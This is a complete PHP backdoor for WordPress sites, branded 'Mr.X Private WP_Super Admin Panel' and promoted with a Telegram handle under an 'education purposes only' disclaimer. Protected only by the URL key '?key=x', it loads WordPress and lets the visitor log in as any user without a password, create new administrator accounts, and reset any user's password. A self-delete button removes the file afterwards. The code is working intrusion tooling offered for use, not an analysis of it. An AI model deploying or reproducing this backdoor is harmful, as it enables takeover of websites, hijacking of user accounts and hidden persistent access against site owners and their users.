<?php
// ───────────────────────────────────────────────
// Basic protection: single letter key 'x'
// ───────────────────────────────────────────────
if (!isset($_GET['key']) || $_GET['key'] !== 'x') {
http_response_code(403);
die('Access denied – use ?key=x');
}
// ───────────────────────────────────────────────
// MAXIMUM COMPATIBILITY WP LOADER
// ───────────────────────────────────────────────
$possible_wp_load = null;
$search_dirs = [
__DIR__,
dirname(__DIR__),
dirname(__DIR__, 2),
dirname(__DIR__, 3),
dirname(__DIR__, 4),
dirname(__DIR__, 5),
dirname(__DIR__, 6),
rtrim($_SERVER['DOCUMENT_ROOT'] ?? '', '/') . '',
rtrim($_SERVER['DOCUMENT_ROOT'] ?? '', '/') . '/wordpress',
rtrim($_SERVER['DOCUMENT_ROOT'] ?? '', '/') . '/wp',
rtrim($_SERVER['DOCUMENT_ROOT'] ?? '', '/') . '/blog',
rtrim($_SERVER['DOCUMENT_ROOT'] ?? '', '/') . '/site',
dirname($_SERVER['SCRIPT_FILENAME'] ?? __DIR__),
];
foreach ($search_dirs as $dir) {
if (empty($dir) || !is_dir($dir)) continue;
$candidate = rtrim($dir, '/') . '/wp-load.php';
if (file_exists($candidate)) {
$possible_wp_load = $candidate;
break;
}
}
if (!$possible_wp_load && file_exists(dirname(__DIR__) . '/wp-config.php')) {
define('ABSPATH', dirname(__DIR__) . '/');
$possible_wp_load = ABSPATH . 'wp-load.php';
}
if ($possible_wp_load && file_exists($possible_wp_load)) {
require_once $possible_wp_load;
} else {
die("ERROR: wp-load.php NOT FOUND");
}
if (!function_exists('wp_get_current_user')) {
die("WP partially loaded but core functions missing.");
}
// ───────────────────────────────────────────────
// ONE-CLICK LOGIN
// ───────────────────────────────────────────────
if (isset($_GET['login']) && is_numeric($_GET['login'])) {
$uid = (int)$_GET['login'];
$user = get_user_by('ID', $uid);
if (!$user || !$user->exists()) die('User not found');
wp_destroy_current_session();
wp_clear_auth_cookie();
wp_set_current_user($uid, $user->user_login);
wp_set_auth_cookie($uid, true, is_ssl());
wp_safe_redirect(admin_url());
exit;
}
// ───────────────────────────────────────────────
// CREATE NEW ADMIN
// ───────────────────────────────────────────────
$msg = '';
if (isset($_POST['action']) && $_POST['action'] === 'create') {
$u = trim($_POST['username'] ?? '');
$e = trim($_POST['email'] ?? '');
$p = $_POST['password'] ?? '';
$err = [];
if (strlen($u) < 3) $err[] = 'Username too short';
if (!is_email($e)) $err[] = 'Invalid email';
if (strlen($p) < 6) $err[] = 'Password too short';
if (username_exists($u)) $err[] = 'Username exists';
if (email_exists($e)) $err[] = 'Email exists';
if (empty($err)) {
$id = wp_create_user($u, $p, $e);
if (is_wp_error($id)) {
$err[] = $id->get_error_message();
} else {
(new WP_User($id))->set_role('administrator');
$msg = '<div class="alert success">Admin user created successfully<br><strong>Login:</strong> ' . esc_html($u) . '<br><strong>Password:</strong> ' . esc_html($p) . '</div>';
}
}
if ($err) {
$msg = '<div class="alert error">' . implode('<br>', array_map('esc_html', $err)) . '</div>';
}
}
// ───────────────────────────────────────────────
// RESET PASSWORD
// ───────────────────────────────────────────────
if (isset($_POST['action']) && $_POST['action'] === 'reset') {
$uid = (int)($_POST['uid'] ?? 0);
$np = $_POST['newpass'] ?? '';
if ($uid > 0 && strlen($np) >= 6) {
wp_set_password($np, $uid);
$msg = '<div class="alert success">Password updated successfully for user ID ' . $uid . '</div>';
} else {
$msg = '<div class="alert error">Password must be at least 6 characters long</div>';
}
}
// ───────────────────────────────────────────────
// SELF-REMOVE HANDLER
// ───────────────────────────────────────────────
$self_remove_msg = '';
if (isset($_POST['self_remove']) && $_POST['self_remove'] === '1') {
if (@unlink(__FILE__)) {
$self_remove_msg = '<div class="alert success">File has been successfully deleted.</div>';
} else {
$self_remove_msg = '<div class="alert error">Could not delete file. Check file permissions.</div>';
}
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Mr.X Private WP_Super Admin Panel V1 2026</title>
<meta name="robots" content="noindex, nofollow">
<style>
:root {
--primary: #1e40af;
--primary-dark: #1e3a8a;
--danger: #dc2626;
--success: #16a34a;
--light: #f9fafb;
--gray: #6b7280;
--dark: #111827;
}
* { margin:0; padding:0; box-sizing:border-box; }
body {
font-family: 'Segoe UI', system-ui, -apple-system, sans-serif;
background: linear-gradient(to bottom, #f3f4f6, #e5e7eb);
color: var(--dark);
min-height: 100vh;
line-height: 1.6;
}
.banner {
background: linear-gradient(135deg, var(--primary) 0%, var(--primary-dark) 100%);
color: white;
padding: 1.5rem 2rem;
text-align: center;
box-shadow: 0 4px 12px rgba(0,0,0,0.15);
}
.banner h1 {
font-size: 1.8rem;
font-weight: 600;
letter-spacing: 0.5px;
}
.container {
max-width: 1200px;
margin: 2rem auto;
padding: 0 1rem;
}
.card {
background: white;
border-radius: 12px;
box-shadow: 0 4px 20px rgba(0,0,0,0.08);
overflow: hidden;
margin-bottom: 2rem;
}
.card-header {
background: var(--primary);
color: white;
padding: 1.25rem 1.75rem;
font-size: 1.25rem;
font-weight: 600;
}
.card-body {
padding: 1.75rem;
}
.form-grid {
display: grid;
grid-template-columns: repeat(auto-fit, minmax(280px, 1fr));
gap: 1.5rem;
margin-bottom: 1.5rem;
}
.form-group label {
display: block;
margin-bottom: 0.5rem;
font-weight: 500;
color: var(--gray);
}
.form-group input {
width: 100%;
padding: 0.75rem 1rem;
border: 1px solid #d1d5db;
border-radius: 6px;
font-size: 1rem;
}
.form-group input:focus {
outline: none;
border-color: var(--primary);
box-shadow: 0 0 0 3px rgba(30,64,175,0.1);
}
.btn {
padding: 0.75rem 1.5rem;
border: none;
border-radius: 6px;
font-size: 1rem;
font-weight: 500;
cursor: pointer;
transition: all 0.2s;
}
.btn-primary { background: var(--primary); color: white; }
.btn-primary:hover { background: var(--primary-dark); }
.btn-danger {
background: var(--danger);
color: white;
}
.btn-danger:hover { background: #b91c1c; }
.alert {
padding: 1rem 1.25rem;
border-radius: 8px;
margin-bottom: 1.5rem;
font-weight: 500;
}
.alert.success {
background: #ecfdf5;
color: #065f46;
border-left: 5px solid var(--success);
}
.alert.error {
background: #fef2f2;
color: #991b1b;
border-left: 5px solid var(--danger);
}
table {
width: 100%;
border-collapse: collapse;
margin-top: 1rem;
}
th, td {
padding: 1rem 1.25rem;
text-align: left;
border-bottom: 1px solid #e5e7eb;
}
th { background: #f3f4f6; font-weight: 600; }
tr:hover { background: #f9fafb; }
.action-cell {
display: flex;
flex-wrap: wrap;
gap: 0.75rem;
align-items: center;
}
.login-link {
display: inline-block;
padding: 0.5rem 1rem;
background: #7c3aed;
color: white;
text-decoration: none;
border-radius: 6px;
font-size: 0.95rem;
}
.login-link:hover { background: #6d28d9; }
.footer-note {
text-align: center;
margin: 3rem 0 1rem;
color: var(--gray);
font-size: 0.9rem;
}
.self-destruct {
margin: 3rem auto 1rem;
text-align: center;
}
.self-destruct button {
padding: 1rem 2.5rem;
font-size: 1.1rem;
font-weight: 600;
}
@media (max-width: 768px) {
.banner h1 { font-size: 1.5rem; }
.form-grid { grid-template-columns: 1fr; }
}
</style>
</head>
<body>
<div class="banner">
<h1>Mr.X Private WP_Super Admin Panel V1 2026</h1>
</div>
<div class="container">
<?php if ($msg) echo $msg; ?>
<?php if ($self_remove_msg) echo $self_remove_msg; ?>
<div class="card">
<div class="card-header">Create New Administrator</div>
<div class="card-body">
<form method="post">
<input type="hidden" name="action" value="create">
<div class="form-grid">
<div class="form-group">
<label>Username</label>
<input type="text" name="username" required autocomplete="off">
</div>
<div class="form-group">
<label>Email Address</label>
<input type="email" name="email" required autocomplete="off">
</div>
<div class="form-group">
<label>Password</label>
<input type="password" name="password" required autocomplete="new-password">
</div>
</div>
<button type="submit" class="btn btn-primary">Create Administrator</button>
</form>
</div>
</div>
<div class="card">
<div class="card-header">All Users</div>
<div class="card-body">
<table>
<thead>
<tr>
<th>ID</th>
<th>Username</th>
<th>Email</th>
<th>Roles</th>
<th>Actions</th>
</tr>
</thead>
<tbody>
<?php
$users = get_users(['orderby' => 'ID']);
foreach ($users as $user) {
$roles = implode(', ', (array)$user->roles);
$login_url = "?key=x&login={$user->ID}";
?>
<tr>
<td><?= esc_html($user->ID) ?></td>
<td><strong><?= esc_html($user->user_login) ?></strong></td>
<td><?= esc_html($user->user_email ?: '—') ?></td>
<td><?= esc_html($roles ?: '—') ?></td>
<td class="action-cell">
<a href="<?= esc_url($login_url) ?>" class="login-link" target="_blank">Login as <?= esc_html($user->user_login) ?></a>
<form method="post" style="margin:0;">
<input type="hidden" name="action" value="reset">
<input type="hidden" name="uid" value="<?= $user->ID ?>">
<input type="password" name="newpass" placeholder="New password" required minlength="6" style="width:160px; padding:0.5rem;">
<button type="submit" class="btn btn-danger" style="padding:0.5rem 1rem; font-size:0.9rem;">Reset</button>
</form>
</td>
</tr>
<?php
}
?>
</tbody>
</table>
</div>
</div>
<!-- Self Remove Button -->
<div class="self-destruct">
<form method="post">
<input type="hidden" name="self_remove" value="1">
<button type="submit" class="btn btn-danger">SELF REMOVE THIS FILE</button>
</form>
<p style="margin-top:0.75rem; font-size:0.9rem; color:#666;">
This action cannot be undone
</p>
</div>
<div class="footer-note">
Private access only • V1 2026
</div>
</div>
</body>
</html>
All system for education purposes only. For more tools: Telegram @jackleet